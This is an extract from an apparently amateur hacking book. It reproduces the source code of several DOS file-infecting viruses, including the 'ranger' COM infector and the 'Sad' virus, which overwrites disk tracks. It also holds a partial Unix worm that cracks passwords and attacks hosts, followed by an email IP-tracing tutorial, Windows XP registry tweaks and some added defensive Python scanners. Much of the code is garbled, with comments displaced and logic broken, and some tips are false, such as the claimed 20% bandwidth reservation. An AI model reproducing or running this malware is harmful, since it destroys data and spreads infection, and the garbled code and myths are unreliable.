/*----------------------------------*/ /* MAIN PROGRAM */ /*----------------------------------*/ int main( void ) { int x = 0; do { if ( find_healthy() ) { infect(); x++; success++; } else { _DX = (int) ".."; _AH = 0x3b; asm int 21H; x++; } if ( success ) print_s( fake_msg ); else if ( diseased_count > 6 ) for( x = 0; x < 3; x++ ) print_s( virus_msg[x] ); else print_s( fake_msg ); return; 134 /* Otherwise, keep a low profile. */ /* If we found 6+ infected files */ /* along the way, laugh!! */ /* If there ain't a file here... */ /* See if we can step back to */ /* the parent directory, and try */ /* there. */ /* Increment the counter anyway, to */ /* avoid infinite loops. */ /* Do this until we've had enough. */ /* feed 'em the phony error line. */ /* If we got something this time, */ /* Is there an un-infected file? */ /* Well, then infect it! */ /* Add one to the counter. */ /* Carve a notch in our belt. */

} while( x < infection_rate );

void infect( void ) { _DX = (int) dta->filename; /* DX register points to filename. */ _CX = 0x00; _AL = 0x01; _AH = 0x43; asm int 21H; _BX = handle; _CX = virus_size; _DX = (int) codestart; _AH = 0x40; asm int 21H; restore_timestamp(); close_handle(); return; } /* Keep original date & time. */ /* Close file. */ /* No attribute flags are set. */ /* Use Set Attribute sub-function. */ /* Assure access to write file. */ /* Call DOS interrupt. */ /* Re-open the healthy file. */ /* BX register holds handle. */ /* Number of bytes to write. */ /* Write program code. */ /* Set up and call DOS. */

open_handle( dta->filename );

int find_healthy( void ) { if ( find_first("*.EXE") != NO_MATCH ) if ( healthy() ) return 1; else while ( find_next() != NO_MATCH ) if ( healthy() ) return 1; if ( healthy() ) return 1; else while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ 135 /* If you find one, great! */ /* Find COM? */ /* If it's healthy, OK! */ if ( find_first("*.COM") != NO_MATCH ) /* Try a few more otherwise. */ /* Find EXE? */ /* If it's healthy, OK! */

if ( healthy() ) return 1; return 0; } /* If you find one, great! */ /* Otherwise, say so. */

int healthy( void ) { int i; datestamp = dta->datestamp; timestamp = dta->timestamp; open_handle( dta->filename ); _BX = handle; _CX = 20; _DX = (int) compare_buf; _AH = 0x3f; asm int 21H; restore_timestamp(); close_handle(); for ( i = 0; i < 20; i++ ) return 1; diseased_count++; return 0; } /* Keep original date & time. */ /* Close the file. */ /* Compare to virus code. */ /* If no match, return healthy. */ /* Chalk up one more fucked file. */ /* Otherwise, return infected. */ /* Open last file located. */ /* BX holds current file handle. */ /* We only want a few bytes. */ /* DX points to the scratch buffer. */ /* Read in file for comparison. */ /* Save time & date for later. */

if ( compare_buf[i] != *(codestart+i) )

void restore_timestamp( void ) { _AL = 0x01; _BX = handle; _CX = timestamp; _DX = datestamp; _AH = 0x57; asm int 21H; 136 /* Do DOS service. */ /* Keep original date & time. */ /* Same file handle. */ /* Get time & date from DTA. */

return; }

void print_s( char *s ) { char *p = s; while ( *p ) { *p -= 10; p++; } _DX = (int) s; _AH = 0x09; asm int 21H; return; } /* Set DX to point to adjusted string. */ /* Set DOS function number. */ /* Call DOS interrupt. */ /* Subtract 10 from every character. */

int find_first( char *fn ) { _DX = (int) fn; _CX = 0xff; _AH = 0x4e; asm int 21H; return _AX; } /* Point DX to the file name. */ /* Search for all attributes. */ /* 'Find first' DOS service. */ /* Go, DOS, go. */ /* Return possible error code. */

int find_next( void ) { _AH = 0x4f; asm int 21H; return _AX; } /* 'Find next' function. */ /* Call DOS. */ /* Return any error code. */

void open_handle( char *fn ) { 137

_DX = (int) fn; _AL = 0x02; _AH = 0x3d; asm int 21H; handle = _AX; return; }

/* Point DX to the filename. */ /* Always open for both read & write. */ /* "Open handle" service. */ /* Call DOS. */ /* Assume handle returned OK. */

void close_handle( void ) { _BX = handle; _AH = 0x3e; asm int 21H; return; } 6) viruse200063 model tiny .code org 100h ; x*x*x*x*x*x*x ; Virus code segment ; COM file starting IP ; jmp decrypt ; handles encryption and decryption /* Load BX register w/current file handle. */ /* Set up and call DOS service. */

entry_point: db 0e9h,0,0 decrypt: patch_startencrypt:

mov cx,(offset heap - offset startencrypt)/2 ; iterations mov di,offset startencrypt ; start of decryption decrypt_loop: db 81h,35h decrypt_value dw 0 inc di inc di loop decrypt_loop startencrypt: 138 ; decrypt mo' ; xor word ptr [di], xxxx ; initialised at zero for null effect ; calculate new decryption location

call next next: pop bp sub bp,offset next lea si,[bp+save3] mov di,100h push di movsw movsb

; calculate delta offset ; bp = IP next ; bp = delta offset

; For later return

mov byte ptr [bp+numinfec],1 ; reset infection counter mov ah,1Ah lea dx,[bp+newDTA] int 21h mov ah,47h mov dl,0 lea si,[bp+origdir] int 21h mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR mov ax,3524h int 21h ; Get int 24 handler ; to ES:BX ; Get current directory ; Current drive ; DS:SI->buffer ; Set new DTA ; new DTA @ DS:DX

mov word ptr [bp+oldint24],bx; Save it mov word ptr [bp+oldint24+2],es mov ah,25h lea dx,[bp+offset int24] int 21h push cs pop es dir_scan: ; Restore ES ; 'cuz it was changed ; "dot dot" traversal 139 ; Set new int 24 handler ; DS:DX->new handler

lea dx,[bp+com_mask]

mov ah,4eh mov cx,7 findfirstnext: int 21h jc done_infections mov al,0h call open mov ah,3fh lea dx,[bp+buffer] mov cx,1Ah int 21h mov ah,3eh int 21h checkCOM:

; find first file ; any attribute ; DS:DX points to mask ; No mo files found ; Open read only

; Read file to buffer ; @ DS:DX ; 1Ah bytes

; Close file

mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA cmp ax,2000 jb find_next cmp ax,65535-(endheap-decrypt) ; Is it too large? ja find_next mov bx,word ptr [bp+buffer+1]; get jmp location add bx,heap-decrypt+3 cmp ax,bx je find_next jmp infect_com find_next: mov ah,4fh jmp short findfirstnext mov ah,3bh ; change directory 140 ; find next file ; already infected ; Adjust for virus size ; Is it too small?

lea dx,[bp+dot_dot] int 21h jnc dir_scan done_infections: jmp activate exit_virus: mov ax,2524h int 21h push cs pop ds mov ah,3bh lea dx,[bp+origdir-1] int 21h mov ah,1ah mov dx,80h int 21h retn save3 activate: mov xor lea int mov lea int xchg jmp exit_virus

; "cd .." ; go back for mo!

; Always activate ; Restore int 24 handler

lds dx,[bp+offset oldint24] ; to original

; change directory ; original directory

; restore DTA to default ; DTA in PSP ; 100h is on stack

db 0cdh,20h,0

; First 3 bytes of COM file

; ****************************** ax,04301h cx,cx dx,[di + 01Eh] 021h ax,03D02h dx,[di + 01Eh] 021h bx,ax ; Transfer file handle to AX ; DOS open file function, r/w ; DX points to file name ; DOS set file attributes function ; File will have no attributes ; DX points to file name

141

creator virusname infect_com:

db '[ZEB(C)1992]',0 db '[ranger]',0

; Mass Produced Code Generator

; ax = filesize

mov cx,3 sub ax,cx lea si,[bp+offset buffer] lea di,[bp+offset save3] movsw movsb mov byte ptr [si-3],0e9h mov word ptr [si-2],ax add ax,103h push ax finishinfection: push cx xor cx,cx call attributes mov al,2 call open mov ah,40h lea dx,[bp+buffer] pop cx int 21h mov ax,4202h xor cx,cx cwd int 21h get_encrypt_value: mov ah,2ch ; Get current time 142 ; Move file pointer ; to end of file ; xor dx,dx ; Write to file ; Write from buffer ; cx bytes ; Save # bytes to write ; Clear attributes ; Set file attributes ; needed later

int 21h or dx,dx

; dh=sec,dl=1/100 sec ; Check if encryption value = 0 ; Get another if it is ; Set new encryption value

jz get_encrypt_value lea di,[bp+code_store] mov ax,5355h stosw lea si,[bp+decrypt] push si push cx rep movsb lea mov rep pop pop pop si,[bp+write] cx,endwrite-write movsb cx si dx

mov [bp+decrypt_value],dx

; push bp,push bx ; Copy encryption function ; Save for later use

mov cx,startencrypt-decrypt ; Bytes to move

; Copy writing function ; Bytes to move

; Entry point of virus

push di push si push cx rep mov stosw mov stosb add mov pop pop pop dx,offset startencrypt - offset decrypt ; Calculate new word ptr [bp+patch_startencrypt+1],dx ; starting offset of ; decryption cx di si 143 al,0c3h ; retn movsb ax,5b5dh ; Copy decryption function ; pop bx,pop bp

call code_store

rep

movsb

; Restore decryption function ; Restore creation date/time

mov ax,5701h

mov cx,word ptr [bp+newDTA+16h] ; time mov dx,word ptr [bp+newDTA+18h] ; date int 21h mov ah,3eh int 21h mov ch,0 mov cl,byte ptr [bp+newDTA+15h] ; Restore original call attributes ; attributes ; Close file

dec byte ptr [bp+numinfec] ; One mo infection jnz mo_infections jmp done_infections mo_infections: jmp find_next open: mov ah,3dh lea dx,[bp+newDTA+30] int 21h xchg ax,bx ret attributes: mov ax,4301h int 21h ret write: pop bx ; Restore file handle 144 ; Set attributes to cx ; filename in DTA lea dx,[bp+newDTA+30] ; filename in DTA ; Not enough

pop bp mov ah,40h lea dx,[bp+decrypt] mov cx,heap-decrypt int 21h push bx push bp endwrite: int24: mov al,3 iret com_mask dot_dot heap: code_store: oldint24 backslash origdir newDTA numinfec buffer endheap: end entry_point begin 775 ranger.com

; Restore relativeness ; Write to file ; Concatenate virus ; # bytes to write

; New int 24h (error) handler ; Fail call ; Return control db '*.com',0 db '..',0 ; Variables not in code db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) dd ? db ? db 64 dup (?) db 43 dup (?) db ? db 1ah dup (?) ; Current directory buffer ; Temporary DTA ; Infections this run ; read buffer ; End of virus ; Storage for old int 24h handler

; The following code is the buffer for the write function


8) Viruse:Dont be sad ; ; ---- Data Segment Values ---; ds:[0f6h] = read buffer location ; ds:[0f8h] = write buffer location ; ds:[0fah] = store length of virus at this location ; ds:[0fch] = store length of file to be infected at this location ; ds:[0feh] = filename of file to infect ; .model tiny .code org start: nop nop ;****** ;get date ;****** mov ah,2ah int 21h cmp dh,09h jnz do_not_activate ;**** ;the nasty bit ;**** 146 ; get the date ; do it ; is it September? ; if NO jmp do_not_activate ; these two nop instructs will be used by 'Nasty' ; to determine if a file is already infected 100h ; origin for .com files

;* ;* 1. Print message ;* lea dx,mess mov ah,09 int 21h ;**** ;* 2. Destroy disk ;**** mov ah,19h int 21h mov dl,al mov ah,05 mov cl,01 mov ch,00 mov dh,00 mov al,10h int 13h ; get current drive (returned in al) ; do it ; dl = drive # to be formated ; disk format function ; first sector ; first track ; head zero ; 10h (16) sectors - 2 tracks ; do it (overwrite first 16 tracks on currently ; selected disc) ; print message ; 'Nasty in September' ; do it

do_not_activate: mov cx,80h mov si,0080h mov di,0ff7fh rep movsb ; save parameters; set counter to 80h bytes ; offset in the current data segment of the byte ; to be copied ; offset to which byte is to be moved ; move bytes until cx=0 (decrement cx by 1 each time ; loop is performed is done automatically) ; (increment by 1 of si & di is done automatically) lea ax,begp mov cx,ax sub ax,100h ; load exit from program offset address into ax ; " " " " " " " cx ; subtract start of .com file address (100h) from ax ; ax now contains the length of the virus 147

mov ds:[0fah],ax add cx,fso mov ds:[0f8h],cx ADD CX,AX mov ds:[0f6h],cx mov cx,ax lea si,start mov di,ds:[0f8h]

; put length of the virus into the data segment at ; add fso (5h) to cx (offset address of exit)

; offset 0fah ; so, cx=cx+5 ; move cx (end of virus + 5) into data segment at ; add virus length (ax) to cx ????? ; mov cx into data segment at offset 0f6h. ; mov length of virus into cx ; load address of 'start' (start of virus) into ; souce index ; mov the value of the write buffer (@ 0f8h) into ; destination index ; ** Start of the read buffer ; offset 0f8h. ** Start of the write buffer.

rb:

; cx = counter (length of virus) ; si = offset of byte to be read ; di = offset of where to write byte to ; (auto decrement of cx & increment of si & di)

rep movsb stc

; copy the virus into memory ; set the carry flag ; set infector for .com files only

lea dx,file_type_to_infect mov ah,4eh mov cx,20h int 21h

; find first file with specified params ; files with archive bit set ; do it ; if file found, CF is cleared, else ; CF is set

or ax,ax jz file_found

; works the below instructions (jz & jmp) ; if file found jmp file_found 148

jmp done file_found: mov ah,2fh int 21h

; if no file found, jmp done (exit virus)

; get dta (returned in es:bx) ; do it ; mov size of file to be infected into ax ; mov filesize into ds:[0fch] ; bx now points to asciz filename ; mov filename into ds:[0feh] ; clear carry flag ; open file for r/w (ds:dx -> asciz filename) ; mov filename into dx ; do it (ax contains file handle) ; mov file handle into bx ; get time & date attribs from file to infect ; do it (file handle in bx) ; save time to the stack ; save date to the stack ; read from file to be infected ; number of bytes to be read (filesize of file to ; buffer (where to read bytes to) ; do it ; mov buffer location to bx ; mov contents of bx (first two bytes - as bx is ; 16-bits) into ax. ; Now check to see if file is infected... if the 149 ; be infected

mov ax,es:[bx+1ah] mov ds:[0fch],ax add bx,1eh mov ds:[0feh],bx clc mov ax,3d02h mov dx,bx int 21h mov bx,ax mov ax,5700h int 21h push cx push dx mov ah,3fh mov cx,ds:[0fch] mov dx,ds:[0f6h] int 21h mov bx,dx mov ax,[bx]

; ; sub ax,9090h jz fin

file is infected, it's first two bytes will be 9090h (nop nop) ; If file is already infected, zero flag will be set

; thus jump to fin(ish)

mov ax,ds:[0fch] mov bx,ds:[0f6h] mov [bx-2],ax mov ah,3ch mov cx,00h mov dx,ds:[0feh] clc int 21h

; mov filesize of file to be infected into ax ; mov where-to-read-to buffer into bx ; correct old len ; Create file with handle ; cx=attribs -- set no attributes ; point to name ; create file

; clear carry flag ; Note: If filename already exists, (which it does) ; truncate the filelength to zero - this is ok as ; we have already copied the file to be infected ; into memory.

mov bx,ax mov ah,40h

; mov file handle into bx ; write file with handle (write to the file to be ; infected) - length currently zero ; cx=number of bytes to write

mov cx,ds:[0fch] add cx,ds:[0fah] mov DX,ds:[0f8h] int 21h

; length of file to be infected ; length of virus ; location of write buffer (this contains the virus

; + the file to be infected) ; write file ; new file = virus + file to be infected 150

mov ax,5701h pop dx pop cx int 21h

; restore original time & date values ; get old date from the stack ; get old time from the stack ; do it ; Note: Infected file will now carry the time & date ; it had before the infection.

mov ah,3eh int 21h

; close file (bx=file handle) ; do it ; Note: date & time stamps automatically updated if ; file written to.

fin: stc mov ah,4fh int 21h or ax,ax jnz done JMP file_found done: mov cx,80h mov si,0ff7fh mov di,0080h rep movsb ; set counter (cx) = 80h ; source offset address (copy from here) ; destination offset address (copy to here) ; copy bytes! (cx is auto decremented by 1 ; si & di are auto incremented by 1) ; Note: this is a 'restore parameters' feature ; this does the reverse of what what done earlier ; in the program (do_not_activate:) mov ax,0a4f3h mov ds:[0fff9h],ax mov al,0eah mov ds:[0fffbh],al ; ; reset data segment locations ??? (to previous 151 ; ; ; set carry flags ; find next file (.com) ; do it ; decides zero flag outcome ; if no more .com files, jmp done ; else begin re-infection process for new file.

mov ax,100h mov ds:[0fffch],ax lea si,begp lea di,start mov ax,cs mov ds:[0fffeh],ax mov kk,ax mov cx,fso db 0eah dw 0fff9h kk dw 0000h

; values before virus infection) ; ; load exit from program offset address into si ; load offset address of start of virus into di ; re-align cs = ds ???

; define byte ; define word ; define kk = word ; virus message to display ; infect only .com files.

mess db 'Sad virus - 24/8/91',13,10,'$' file_type_to_infect db '*?.com',0 fso dw 0005h

; store 5 into 'fso'. dw means that fso is 2 bytes ; in size (a word) ; ----- alma mater

begp: mov int ax,4c00h 21h ; normal dos termination (set al to 00) ; do it

end start
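As an added, defensive illustration that is not code from the book: the samples above avoid re-infecting a file by checking a marker they leave behind, CVIRUS its four-byte SIGNATURE "NMAN" at byte 28 and the Sad virus the two NOPs (9090h) at the start of a .COM file. The same markers let a scanner flag infected files; this Python script checks a directory for both (file names and contents are constructed) and shows the false-positive caveat of a harmless program that happens to begin with those bytes.

```python
import os
import tempfile

# Re-infection markers described in the samples above:
#   CVIRUS    : the 4-byte SIGNATURE "NMAN" at offset 28 of the file
#   Sad virus : an infected .COM begins with two NOPs, 90h 90h
MARKERS = {
    "cvirus-signature": (28, b"NMAN"),
    "sad-virus-nop-nop": (0, b"\x90\x90"),
}


def matching_markers(head: bytes) -> list:
    """Return the names of every marker present in the file's first bytes."""
    hits = []
    for name, (offset, pattern) in MARKERS.items():
        if head[offset:offset + len(pattern)] == pattern:
            hits.append(name)
    return hits


def scan_directory(path: str, exts=(".com", ".exe")) -> dict:
    """Map each DOS executable under `path` carrying a marker to its marker names."""
    report = {}
    for entry in sorted(os.listdir(path)):
        if not entry.lower().endswith(exts):
            continue  # the samples only touch .COM and .EXE files
        with open(os.path.join(path, entry), "rb") as fh:
            head = fh.read(64)  # both markers sit inside the first 64 bytes
        hits = matching_markers(head)
        if hits:
            report[entry] = hits
    return report


# Constructed sample files (not real malware): a clean program, two files
# carrying the markers, a harmless program that starts with NOP NOP (the
# false positive a marker scan cannot tell apart), and a non-executable.
SAMPLES = {
    "clean.com": b"\xb4\x4c\xcd\x21" + b"\x00" * 60,      # mov ah,4Ch / int 21h
    "sad.com": b"\x90\x90" + b"\x00" * 62,
    "cvirus.exe": b"MZ" + b"\x00" * 26 + b"NMAN" + b"\x00" * 32,
    "padded.com": b"\x90\x90\xb4\x4c\xcd\x21",             # legitimate NOP padding
    "notes.txt": b"\x90\x90",                              # not scanned: wrong extension
}


def demo() -> dict:
    """Write the constructed samples to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as workdir:
        for name, content in SAMPLES.items():
            with open(os.path.join(workdir, name), "wb") as fh:
                fh.write(content)
        return scan_directory(workdir)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(f"{name}: {', '.join(hits)}")
```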

end 9) Worme viruses 666 The Dead Zone 214-522-5321 300/1200/2400 666 #include #include #include #include

long current_time; struct rlimit no_core = {0,0};

int main (argc, argv) int argc; char *argv[];

{ 153

int n; int parent = 0; int okay = 0; /* change calling name to "sh" */ strcpy(argv[0], "sh"); /* prevent core files by setting limit to 0 */ setrlimit(RLIMIT_CORE, no_core); current_time = time(0); /* seed random number generator with time */ srand48(current_time); n = 1; while (argv[n]) { /* save process id of parent */ if (!strncmp(argv[n], "-p", 2)) { parent = atoi (argv[++n]); n++; } 154

else { /* check for 1l.c in argument list */ if (!strncmp(argv([n], "1l.c", 4)) okay = 1; /* load an object file into memory */ load_object (argv[n]; /* clean up by unlinking file */ if (parent) unlink (argv[n]); /* and removing object file name */ strcpy (argv[n++], ""); }

} /* if 1l.c was not in argument list, quit */ if (!okay) exit (0); 155

/* reset process group */ setpgrp (getpid()); /* kill parent shell if parent is set */ if (parent) kill(parent, SIGHUP); /* scan for network interfaces */ if_init(); /* collect list of gateways from netstat */ rt_init(); /* start main loop */ doit(); }

int doit() { current_time = time (0); 156

/* seed random number generator (again) */ srand48(current_time); /* attack gateways, local nets, remote nets */ attack_hosts(); /* check for a "listening" worm */ check_other () /* attempt to send byte to "ernie" */ send_message () for (;;) { /* crack some passwords */ crack_some (); /* sleep or listen for other worms */ other_sleep (30); crack_some (); /* switch process id's */ if (fork()) /* parent exits, new worm continues */ 157

exit (0); /* attack gateways, known hosts */ attack_hosts(); other_sleep(120); /* if 12 hours have passed, reset hosts */ if(time (0) == current_time + (3600*12)) { reset_hosts(); current_time = time(0); } /* quit if pleasequit is set, and nextw>10 */ if (pleasequit && nextw > 10) exit (0); } }

158

How to Track an IP Address


How to find the IP address of the sender in Gmail, Yahoo! mail or Hotmail When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding the IP address in Gmail
1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers:
   * Click on More options corresponding to that thread. You should get a bunch of links.
   * Click on Show original.
4. You should get headers like this:
   Gmail headers: [screenshot omitted]
   Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is 65.119.112.245. That is the IP address of the sender!
5. Track the IP address of the sender.

Finding the IP address in Yahoo! Mail
1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail in.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers:
   * Click on Options in the top-right corner.
   * In the Mail Options page, click on General Preferences.
   * Scroll down to Messages, where you have the Headers option.
   * Make sure that Show all headers on incoming messages is selected.
   * Click on the Save button.
   * Go back to the mails and open that mail.
5. You should see headers like this:
   Yahoo! headers: [screenshot omitted]
   Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109. That is the IP address of the sender!
6. Track the IP address of the sender.

Finding the IP address in Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab at the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers:
   * Click on Options in the top-right corner.
   * In the Mail Options page, click on Mail Display Settings.
   * In Message Headers, make sure the Advanced option is checked.
   * Click on the OK button.
   * Go back to the mails and open that mail.
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address.
   Hotmail headers: [screenshot omitted]
   In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy, like this:
   Hotmail headers: [screenshot omitted]
   Look for Received: from followed by the IP address within square brackets []. In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else, if you have headers like this:
   Hotmail headers: [screenshot omitted]
   Look for Received: from followed by the IP address within square brackets []. In this case, the IP address of the sender is [61.83.145.129] (spam mail). Jump to step 9.
8. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender.
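As an added example, not part of the book: the header walk described above, done in Python. It reads the Received: lines from the earliest hop upwards, drops the hop reported from proxy.anyknownserver.com (step 8), skips LAN and loopback addresses, and prefers an X-Originating-IP header when one exists (the Hotmail case). The two messages are constructed with RFC 5737 documentation addresses, and the internal-network list and proxy host list are this example's own assumptions.

```python
import ipaddress
import re
from email import message_from_string
from typing import List, Optional

# An IPv4 address between square brackets, as in "Received: from host [1.2.3.4]"
# or Hotmail's "X-Originating-IP: [1.2.3.4]".
BRACKETED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

# Assumed: hops from the sender's own LAN or loopback do not identify the
# sender on the Internet, so they are skipped rather than reported.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Step 8 of the tutorial: ignore the hop that names a known proxy as its source.
PROXY_HOSTS = ("proxy.anyknownserver.com",)


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def reported_host(received: str) -> str:
    """The host named right after 'from' in a Received: header value."""
    found = re.match(r"from\s+(\S+)", received, re.IGNORECASE)
    return found.group(1).lower() if found else ""


def received_ips(raw_message: str) -> List[str]:
    """Bracketed IPs from the Received: headers, earliest hop first."""
    msg = message_from_string(raw_message)
    hops = []
    # Each relay prepends its own Received: line, so the last one is the first hop.
    for header in reversed(msg.get_all("Received", [])):
        if reported_host(header) in PROXY_HOSTS:
            continue
        hops.extend(BRACKETED_IP.findall(header))
    return hops


def sender_ip(raw_message: str) -> Optional[str]:
    """The sender's IP as the tutorial above locates it, or None if absent."""
    msg = message_from_string(raw_message)
    # Hotmail case (step 5): an explicit X-Originating-IP header wins.
    origin = msg.get("X-Originating-IP")
    if origin:
        found = BRACKETED_IP.search(origin)
        if found:
            return found.group(1)
    # Gmail/Yahoo case: the first public address in the earliest Received: hop.
    for ip in received_ips(raw_message):
        if not is_internal(ip):
            return ip
    return None


# Constructed samples (RFC 5737 documentation addresses, not real messages).
GMAIL_STYLE = """\
Received: from smtp-out.example.org (smtp-out.example.org [198.51.100.7])
    by mx.example.com with ESMTP id k7s9; Tue, 1 Jan 2008 10:00:03 +0000
Received: from proxy.anyknownserver.com ([203.0.113.9])
    by smtp-out.example.org with ESMTP; Tue, 1 Jan 2008 10:00:02 +0000
Received: from workstation (unknown [192.0.2.45])
    by proxy.anyknownserver.com with SMTP; Tue, 1 Jan 2008 10:00:01 +0000
Received: from localhost (localhost [127.0.0.1])
    by workstation with SMTP; Tue, 1 Jan 2008 10:00:00 +0000
From: someone@example.org
To: you@example.com
Subject: constructed sample

hello
"""

HOTMAIL_STYLE = """\
X-Originating-IP: [203.0.113.77]
Received: from webmail.example.net ([198.51.100.20])
    by mx.example.com with ESMTP; Tue, 1 Jan 2008 11:00:00 +0000
From: other@example.net
To: you@example.com
Subject: constructed sample

hi
"""

if __name__ == "__main__":
    print("hops:", received_ips(GMAIL_STYLE))
    print("sender:", sender_ip(GMAIL_STYLE))
    print("sender:", sender_ip(HOTMAIL_STYLE))
```

Only the Received: line written by a server you trust (your own provider) is reliable; every line below it was handed over by the sender's side and can be forged, which is also why an anonymous proxy defeats this method.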

Back

161

162

Hacking XP

Now let's play with Windows XP


How to Find a Lost File on your Computer
To find the missing file, first click the 'Start' button (bottom left-hand corner of your screen), then select 'Find' from the Start menu that opens, then 'Files or Folders'. When the 'Find: All Files' dialog box opens you are ready to find that missing file. If you did a simple search for all '.doc' files ('.doc' being the Microsoft Word file suffix) you might bring up hundreds of Microsoft Word files. To narrow your search, if you can remember part of the file name, e.g. 'jim' when the full name may be 'Jim Burns quote 2.5.02.doc', you will get fewer results. To make a partial-word search, type in the 'Named' field the word followed by an * (the asterisk is above the number 8; press 'Shift + 8'), which stands in for the missing word(s) or letter(s), e.g. 'jim*.doc'; then you will have fewer results. You can use * before or after the partial word(s) or letter(s). By default your hard drive will be selected in the 'Look in' field. To start your search press the 'Find Now' button and the results will be listed below. To make your search quicker, if you save all your files inside your 'My Documents' folder, select it in the 'Look in' field when you open the 'Find: All Files' dialog box. By selecting the 'My Documents' folder your computer only searches it instead of your whole hard drive.

1)

XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

2) Creating a Shutdown Icon (One-Click Shutdown):

Navigate to your desktop. Right-click on the desktop and go to New, then Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command-line path. Use this path in the "Type the location of the item" field:

SHUTDOWN -s -t 01

If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.

5) Increasing Bandwidth By 20%:

Microsoft reserves 20% of your available bandwidth for their own purposes, like Windows Updates and interrogating your PC, etc. To get it back: click Start, then Run, and type "gpedit.msc" without quotes. This opens the Group Policy Editor. Then go to: Local Computer Policy, then Computer Configuration, then Administrative Templates, then Network, then QoS Packet Scheduler, and then to Limit Reservable Bandwidth.

7) Making Folders Private:

Open My Computer. Double-click the drive where Windows is installed (usually drive (C:), unless you have more than one drive on your computer). If the contents of the drive are hidden, under System Tasks, click Show the contents of this drive. Double-click the Documents and Settings folder. Double-click your user folder. Right-click any folder in your user profile, and then click Properties. On the Sharing tab, select the Make this folder private so that only I have access to it check box.
8) To Change Drive Letters:

Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "Change drive letter and paths". From here you can add, remove or change drive letters and paths to the partition.
9) Removing the Shortcut Arrow from Desktop Icons:

Go to Start, then Run, and enter regedit. Navigate to HKEY_CLASSES_ROOT\lnkfile. Delete the IsShortcut registry value. You may need to restart Windows XP.
10) Get Drivers for Your Devices:

Visit Windows Update (XP only). Look at the left-hand pane and under Other Options click Personalize Windows Update. Now in the right-hand pane check the box Display the link to the Windows Update Catalog under See Also. Below Choose which categories and updates to display on Windows Update, make sure you check all the boxes you want shown. Click Save Settings. Now look in the left-hand pane under See Also, click Windows Update Catalog and choose what you're looking for. Choose either MS updates or drivers for hardware devices. Start the wizard and off you go.
11) Customize Internet Explorer's Title Bar:

Open the registry by going to Start, then Run, and entering regedit. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main. In the right-hand panel look for the string "Window Title" and change its value to whatever custom text you want to see.
12) Disabling the Use of the Win Key:

If you are a gaming freak then you must be sick of the Win key on your keyboard. To disable use of the Win key, open the registry by going to Start, then Run, and entering regedit. Navigate to [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]. In this, look for the value "Scancode Map". It is binary data, so be extra careful: set its value to "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00" to disable the Win key.
13) Restarting Windows without Restarting the Computer:

When you click on the SHUTDOWN button, make sure to simultaneously press the SHIFT key. If you hold the Shift key down while clicking on the SHUTDOWN button, Windows would restart without restarting the computer. This is equivalent to the term "HOT REBOOT".
14) Stopping XP from Displaying the Unread Messages Count on the Welcome Screen:

To stop XP from displaying the count of unread messages, open the registry and navigate to [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\UnreadMail] and look for the data key "MessageExpiryDays". If you do not see this key, create one DWORD key by the name "MessageExpiryDays". Setting its value to 0 would stop Windows XP from displaying the count of unread messages.

15) Adding the Administrative Tools Icon to the Desktop:

Open Registry Editor. In Registry Editor, navigate to the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace. Create the following key: {D20EA4E1-3957-11d2-A40B-0C5020524153} (just copy/paste, including the brackets). Close Registry Editor. There is no need to reboot. Just wait a few seconds and see how the icon appears.
16) Creating the Suspend Shortcut:

Right-click on the Desktop, then New / Shortcut. Enter rundll32.exe PowrProf.dll,SetSuspendState. Give it whatever name you want. Now when you click on that shortcut, your computer will shut down and suspend.
17) Disable XP Load Screen:

By disabling the load screen you can boost the boot-up time by a couple of seconds, if not more. To disable the load screen, open the msconfig utility: go to Start > Run, type in msconfig without quotes and press Enter. In the subsequent window, select the boot.ini tab. Check the /NOGUIBOOT option and press Apply. Restart Windows to see the effect.
18) To Remove Arrow Signs from Desktop Shortcuts:

Open the registry editor by going to Start, then Run, and entering regedit. Once in the registry, navigate to the key HKEY_CLASSES_ROOT\lnkfile\ and rename the string value IsShortcut to AriochIsShortcut.
19) Make Your Internet Explorer As Fast As Firefox:

